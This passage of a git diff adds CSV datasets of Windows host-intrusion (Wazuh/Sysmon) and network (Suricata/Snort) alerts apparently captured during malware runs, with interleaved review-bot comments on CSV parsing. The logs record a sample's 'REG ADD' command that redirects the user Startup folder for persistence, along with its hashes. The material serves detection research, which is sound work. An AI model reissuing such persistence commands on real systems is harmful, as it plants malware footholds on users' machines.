Williams\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\""\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:16:50.287"",""processGuid"":""{df9fc3d3-aba5-5ecf-0000-00100a6f0b00}"",""processId"":""6556"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Standalone Update Binary"",""details"":""C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \\\""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe\\\""""}}}","C:\\Windows\\system32\\cmd.exe /q /c del /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\""" +"May 28, 2020 @ 12:16:56.951",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-28 12:16:50.287 +ProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00} +ProcessId: 6556 +Image: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary +Details: C:\Windows\system32\cmd.exe /q /c del /q ""C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe""""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:16:50.300789600Z"",""eventRecordID"":""2112"",""processID"":""2180"",""threadID"":""3120"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:16:50.287\r\nProcessGuid: {df9fc3d3-aba5-5ecf-0000-00100a6f0b00}\r\nProcessId: 6556\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary\r\nDetails: C:\\Windows\\system32\\cmd.exe 
/q /c del /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\""\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:16:50.287"",""processGuid"":""{df9fc3d3-aba5-5ecf-0000-00100a6f0b00}"",""processId"":""6556"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Update Binary"",""details"":""C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\\\""""}}}","C:\\Windows\\system32\\cmd.exe /q /c del /q \""C:\\Users\\John Williams\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\""" +"May 28, 2020 @ 12:16:17.528",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1112,ChangeStartupFolderPath +EventType: SetValue +UtcTime: 2020-05-28 12:16:13.505 +ProcessGuid: {df9fc3d3-ab8d-5ecf-0000-00107d210a00} +ProcessId: 6176 +Image: C:\Windows\SysWOW64\REG.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup +Details: C:\ProgramData\f64a428dfd""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell 
Folders\\Startup","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:16:13.526455400Z"",""eventRecordID"":""1919"",""processID"":""2180"",""threadID"":""3120"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1112,ChangeStartupFolderPath\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:16:13.505\r\nProcessGuid: {df9fc3d3-ab8d-5ecf-0000-00107d210a00}\r\nProcessId: 6176\r\nImage: C:\\Windows\\SysWOW64\\REG.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup\r\nDetails: C:\\ProgramData\\f64a428dfd\""""},""eventdata"":{""ruleName"":""T1112,ChangeStartupFolderPath"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:16:13.505"",""processGuid"":""{df9fc3d3-ab8d-5ecf-0000-00107d210a00}"",""processId"":""6176"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\REG.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup"",""details"":""C:\\\\ProgramData\\\\f64a428dfd""}}}","C:\\ProgramData\\f64a428dfd" +"May 28, 2020 @ 12:16:17.487",10,"ATT&CK T1060: Direct Autorun Keys Modification","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:16:13.152 +ProcessGuid: {df9fc3d3-ab8d-5ecf-0000-00107d210a00} +ProcessId: 6176 +Image: C:\Windows\SysWOW64\reg.exe +FileVersion: 10.0.18362.476 (WinBuild.160101.0800) +Description: Registry Console Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: reg.exe +CommandLine: REG ADD 
""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"" /f /v Startup /t REG_SZ /d C:\ProgramData\f64a428dfd +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-ab70-5ecf-0000-00209bfb0300} +LogonId: 0x3FB9B +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A01B3DFF957379E7632891A7992319CE,SHA256=45EFF48450C110B8A6D2A4C0FE31323423851298F6DADF32D73DF91DF7ECB797,IMPHASH=869B9FF91668F96EF68FBE0DB3602587 +ParentProcessGuid: {df9fc3d3-ab8d-5ecf-0000-0010581d0a00} +ParentProcessId: 6148 +ParentImage: C:\ProgramData\f64a428dfd\cmualrc.exe +ParentCommandLine: ""C:\ProgramData\f64a428dfd\cmualrc.exe"" ""","REG ADD \""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\"" /f /v Startup /t REG_SZ /d C:\\ProgramData\\f64a428dfd",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:16:13.166409500Z"",""eventRecordID"":""1918"",""processID"":""2180"",""threadID"":""3120"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:16:13.152\r\nProcessGuid: {df9fc3d3-ab8d-5ecf-0000-00107d210a00}\r\nProcessId: 6176\r\nImage: C:\\Windows\\SysWOW64\\reg.exe\r\nFileVersion: 10.0.18362.476 (WinBuild.160101.0800)\r\nDescription: Registry Console Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: reg.exe\r\nCommandLine: REG ADD \""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\"" /f /v Startup /t REG_SZ /d C:\\ProgramData\\f64a428dfd\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 
{df9fc3d3-ab70-5ecf-0000-00209bfb0300}\r\nLogonId: 0x3FB9B\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A01B3DFF957379E7632891A7992319CE,SHA256=45EFF48450C110B8A6D2A4C0FE31323423851298F6DADF32D73DF91DF7ECB797,IMPHASH=869B9FF91668F96EF68FBE0DB3602587\r\nParentProcessGuid: {df9fc3d3-ab8d-5ecf-0000-0010581d0a00}\r\nParentProcessId: 6148\r\nParentImage: C:\\ProgramData\\f64a428dfd\\cmualrc.exe\r\nParentCommandLine: \""C:\\ProgramData\\f64a428dfd\\cmualrc.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-28 12:16:13.152"",""processGuid"":""{df9fc3d3-ab8d-5ecf-0000-00107d210a00}"",""processId"":""6176"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\reg.exe"",""fileVersion"":""10.0.18362.476 (WinBuild.160101.0800)"",""description"":""Registry Console Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""reg.exe"",""commandLine"":""REG ADD \\\""HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\"" /f /v Startup /t REG_SZ /d C:\\\\ProgramData\\\\f64a428dfd"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-ab70-5ecf-0000-00209bfb0300}"",""logonId"":""0x3fb9b"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A01B3DFF957379E7632891A7992319CE,SHA256=45EFF48450C110B8A6D2A4C0FE31323423851298F6DADF32D73DF91DF7ECB797,IMPHASH=869B9FF91668F96EF68FBE0DB3602587"",""parentProcessGuid"":""{df9fc3d3-ab8d-5ecf-0000-0010581d0a00}"",""parentProcessId"":""6148"",""parentImage"":""C:\\\\ProgramData\\\\f64a428dfd\\\\cmualrc.exe"",""parentCommandLine"":""\\\""C:\\\\ProgramData\\\\f64a428dfd\\\\cmualrc.exe\\\""""}}}", +"May 28, 2020 @ 12:15:56.228",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 28, 2020 @ 12:15:46.412",7,"SessionEnv 
was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 28, 2020 @ 12:15:05.636",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 28, 2020 @ 12:15:05.620",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 28, 2020 @ 12:11:29.200",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 6520; Component = Unknown; Operation = Start IWbemServices::ExecQuery - root\Microsoft\Windows\DeviceGuard : SELECT SecurityServicesConfigured FROM Win32_DeviceGuard ; ResultCode = 0x80041032; PossibleCause = Unknown""",,,, +"May 28, 2020 @ 12:10:03.340",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1112,ChangeStartupFolderPath +EventType: SetValue +UtcTime: 2020-05-26 09:29:17.389 +ProcessGuid: {df9fc3d3-e16d-5ecc-0000-00106b592500} +ProcessId: 1052 +Image: C:\Windows\SysWOW64\REG.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup +Details: C:\ProgramData\f64a428dfd""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell 
Folders\\Startup","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T09:29:17.396376800Z"",""eventRecordID"":""1487"",""processID"":""2176"",""threadID"":""3312"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1112,ChangeStartupFolderPath\r\nEventType: SetValue\r\nUtcTime: 2020-05-26 09:29:17.389\r\nProcessGuid: {df9fc3d3-e16d-5ecc-0000-00106b592500}\r\nProcessId: 1052\r\nImage: C:\\Windows\\SysWOW64\\REG.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup\r\nDetails: C:\\ProgramData\\f64a428dfd\""""},""eventdata"":{""ruleName"":""T1112,ChangeStartupFolderPath"",""eventType"":""SetValue"",""utcTime"":""2020-05-26 09:29:17.389"",""processGuid"":""{df9fc3d3-e16d-5ecc-0000-00106b592500}"",""processId"":""1052"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\REG.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup"",""details"":""C:\\\\ProgramData\\\\f64a428dfd""}}}","C:\\ProgramData\\f64a428dfd" +"May 28, 2020 @ 12:10:03.324",10,"ATT&CK T1060: Direct Autorun Keys Modification","""Process Create: +RuleName: +UtcTime: 2020-05-26 09:29:17.214 +ProcessGuid: {df9fc3d3-e16d-5ecc-0000-00106b592500} +ProcessId: 1052 +Image: C:\Windows\SysWOW64\reg.exe +FileVersion: 10.0.18362.476 (WinBuild.160101.0800) +Description: Registry Console Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: reg.exe +CommandLine: REG ADD 
""HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"" /f /v Startup /t REG_SZ /d C:\ProgramData\f64a428dfd +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300} +LogonId: 0x32D50 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A01B3DFF957379E7632891A7992319CE,SHA256=45EFF48450C110B8A6D2A4C0FE31323423851298F6DADF32D73DF91DF7ECB797,IMPHASH=869B9FF91668F96EF68FBE0DB3602587 +ParentProcessGuid: {df9fc3d3-e16d-5ecc-0000-00100c572500} +ParentProcessId: 6748 +ParentImage: C:\ProgramData\f64a428dfd\cmualrc.exe +ParentCommandLine: c:\programdata\f64a428dfd\cmualrc.exe""","REG ADD \""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\"" /f /v Startup /t REG_SZ /d C:\\ProgramData\\f64a428dfd",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-26T09:29:17.216880400Z"",""eventRecordID"":""1486"",""processID"":""2176"",""threadID"":""3312"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-26 09:29:17.214\r\nProcessGuid: {df9fc3d3-e16d-5ecc-0000-00106b592500}\r\nProcessId: 1052\r\nImage: C:\\Windows\\SysWOW64\\reg.exe\r\nFileVersion: 10.0.18362.476 (WinBuild.160101.0800)\r\nDescription: Registry Console Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: reg.exe\r\nCommandLine: REG ADD \""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\"" /f /v Startup /t REG_SZ /d C:\\ProgramData\\f64a428dfd\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-dfe2-5ecc-0000-0020502d0300}\r\nLogonId: 0x32D50\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A01B3DFF957379E7632891A7992319CE,SHA256=45EFF48450C110B8A6D2A4C0FE31323423851298F6DADF32D73DF91DF7ECB797,IMPHASH=869B9FF91668F96EF68FBE0DB3602587\r\nParentProcessGuid: {df9fc3d3-e16d-5ecc-0000-00100c572500}\r\nParentProcessId: 6748\r\nParentImage: C:\\ProgramData\\f64a428dfd\\cmualrc.exe\r\nParentCommandLine: c:\\programdata\\f64a428dfd\\cmualrc.exe\""""},""eventdata"":{""utcTime"":""2020-05-26 09:29:17.214"",""processGuid"":""{df9fc3d3-e16d-5ecc-0000-00106b592500}"",""processId"":""1052"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\reg.exe"",""fileVersion"":""10.0.18362.476 (WinBuild.160101.0800)"",""description"":""Registry Console Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""reg.exe"",""commandLine"":""REG ADD \\\""HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\"" /f /v Startup /t REG_SZ /d C:\\\\ProgramData\\\\f64a428dfd"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-dfe2-5ecc-0000-0020502d0300}"",""logonId"":""0x32d50"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A01B3DFF957379E7632891A7992319CE,SHA256=45EFF48450C110B8A6D2A4C0FE31323423851298F6DADF32D73DF91DF7ECB797,IMPHASH=869B9FF91668F96EF68FBE0DB3602587"",""parentProcessGuid"":""{df9fc3d3-e16d-5ecc-0000-00100c572500}"",""parentProcessId"":""6748"",""parentImage"":""C:\\\\ProgramData\\\\f64a428dfd\\\\cmualrc.exe"",""parentCommandLine"":""c:\\\\programdata\\\\f64a428dfd\\\\cmualrc.exe""}}}", diff --git a/data/MW_6_NIDS.csv b/data/MW_6_NIDS.csv new file mode 100644 index 0000000..b0af6c1 --- /dev/null +++ b/data/MW_6_NIDS.csv 
@@ -0,0 +1,9 @@
+"@timestamp",message,"log.file.path"
+"May 28, 2020 @ 12:17:07.096","05/28/2020-12:16:58.310591 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.217.132.102:80 -> 172.16.2.2:49736","/var/log/suricata/fast.log"
+"May 28, 2020 @ 12:17:07.096","05/28/2020-12:16:58.310591 [**] [1:2014520:6] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.217.132.102:80 -> 172.16.2.2:49736","/var/log/suricata/fast.log"
+"May 28, 2020 @ 12:16:47.095","05/28-12:16:45.942179 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.217.132.102:80 -> 172.16.2.2:49736","/var/log/snort/alert.fast"
+"May 28, 2020 @ 12:16:47.095","05/28-12:16:45.942179 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.217.132.102:80 -> 172.16.2.2:49736","/var/log/snort/alert.fast"
+"May 28, 2020 @ 12:11:46.980","05/28/2020-12:11:37.037033 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 74.125.100.167:80 -> 172.16.2.2:50178","/var/log/suricata/fast.log"
+"May 28, 2020 @ 12:11:46.980","05/28/2020-12:11:37.037033 [**] [1:2014520:6] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 74.125.100.167:80 -> 172.16.2.2:50178","/var/log/suricata/fast.log"
+"May 28, 2020 @ 12:11:36.979","05/28-12:11:30.822840 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 74.125.100.167:80 -> 172.16.2.2:50178","/var/log/snort/alert.fast"
+"May 28, 2020 @ 12:11:36.979","05/28-12:11:30.822840 [**] [1:2018959:4] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy 
Violation] [Priority: 1] {TCP} 74.125.100.167:80 -> 172.16.2.2:50178","/var/log/snort/alert.fast"
diff --git a/data/MW_7_HIDS_3.csv b/data/MW_7_HIDS_3.csv
new file mode 100644
index 0000000..c8c7264
--- /dev/null
+++ b/data/MW_7_HIDS_3.csv
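Review bot: The `message` column of MW_6_NIDS.csv is the raw fast.log line, so the rule SID, classification and the connection 5-tuple are only recoverable by parsing free text, and the two sensors write different timestamp layouts — `05/28/2020-12:16:58.310591` for the Suricata rows and `05/28-12:16:45.942179` for the Snort rows — so a single pattern will not cover both records of the same event. Each download is also recorded four times (two ET signatures, `[1:2018959:4]` and `[1:2014520:6]`, once per sensor), which consumers counting alerts per sample need to know. I would add a sentence to the dataset README stating that `message` holds unparsed `fast.log`/`alert.fast` text, that the Snort and Suricata timestamp formats differ, and that rows are per-sensor duplicates rather than distinct events.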
@@ -0,0 +1,22 @@
+timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details"
+"May 28, 2020 @ 12:36:05.871",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed.
+Old md5sum was: '7b0e21ee99623454e8d06871f064ed98'
+New md5sum is : '7fa7290c3b0e7b2d8ed5a092299db356'
+Old sha1sum was: 'f63735bbc2e72216030f4e994b7c9785856a9170'
+New sha1sum is : '27735fff26a4f9093576dfbd77d06599094d3497'
+",
+"May 28, 2020 @ 12:36:04.638",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed.
+Old md5sum was: '451281856a95784f3f631c6ed2dfd3d2'
+New md5sum is : '99a30c0c876d598ceb808b943c81bfa8'
+Old sha1sum was: 'ce278144ea52b95bdfabfb8c3a68a61d709530c4'
+New sha1sum is : '71674028950e3a20d32dc6bd8fca028c5759741d'
+",
+"May 28, 2020 @ 12:36:04.624",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed.
+Old md5sum was: '8e9147c00e3845c0b79118bcdba05339'
+New md5sum is : '47f3ce5d928e10eebf2c572e4242a131'
+Old sha1sum was: '27fd277750d88f31b0a0405777373541ddaeabdf'
+New sha1sum is : '92fd10acf94294026e1938c3ec692c3cb031e33b'
+",
+"May 28, 2020 @ 12:34:38.990",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,,
+"May 28, 2020 @ 12:34:26.839",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,,
+"May 28, 2020 @ 12:31:31.875",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 6060; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\WMI : SELECT * FROM BatteryFullChargedCapacity; ResultCode = 0x80041010; PossibleCause = Unknown""",,,,
diff --git a/data/MW_7_NIDS.csv b/data/MW_7_NIDS.csv
new file mode 100644
index 0000000..03c3de0
--- /dev/null
+++ b/data/MW_7_NIDS.csv
@@ -0,0 +1 @@
+"@timestamp",message,"log.file.path"
diff --git a/data/MW_9_HIDS_1.csv b/data/MW_9_HIDS_1.csv
new file mode 100644
index 0000000..cacf36c
--- /dev/null
+++ b/data/MW_9_HIDS_1.csv
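Review bot: Every `full_log` value in the "Integrity checksum changed." rows of MW_7_HIDS_3.csv spans six physical lines and ends with a newline before the closing quote (the `+",` lines), so the file is only readable with a quote-aware RFC 4180 CSV parser; line-oriented tooling (`wc -l`, `grep`, a naive split on newline) will miscount records, and the same multi-line layout continues in MW_9_HIDS_1.csv. The header declares eight columns, but `data.win.eventdata.commandLine`, `data.win.eventdata.targetObject` and `data.win.eventdata.details` are empty in all 21 data rows, which is consistent with no Sysmon-derived rule firing for this sample but is not stated anywhere; likewise the `File '...'` entries are registry keys, not filesystem paths, despite the wording. A short README note naming the parser requirement, the registry-key meaning of the `File` entries and the reason the Sysmon columns are blank would save dataset consumers a debugging round.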
@@ -0,0 +1,469 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 7, 2020 @ 09:31:14.194",3,"Service startup type was changed", +"Apr 7, 2020 @ 09:31:13.315",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)", +"Apr 7, 2020 @ 09:31:09.787",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'", +"Apr 7, 2020 @ 09:30:01.488",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '93c2f688a68bea92ca0316b543b731f9' +New md5sum is : '7e38d7d48acba553e9b927a185580478' +Old sha1sum was: '562310fa74b7d8dc4147b75600dba6658f8f1bc8' +New sha1sum is : '93c7740e06e3ad95b64cba0c84950355bbe16095' +" +"Apr 7, 2020 @ 09:30:01.472",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'a0df8d6e879d924da3288b2aa0b85114' +New md5sum is : 'e4d19d51bb57f6bbddefe526ef7a7eae' +Old sha1sum was: '5b3369bb152c26552a26be399f0ea043686a36fe' +New sha1sum is : '75b5499585597cca71a429fe77e729953593c698' +" +"Apr 7, 2020 @ 09:29:58.286",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2a22d' was added. +" +"Apr 7, 2020 @ 09:29:58.269",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:29:50.926",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. 
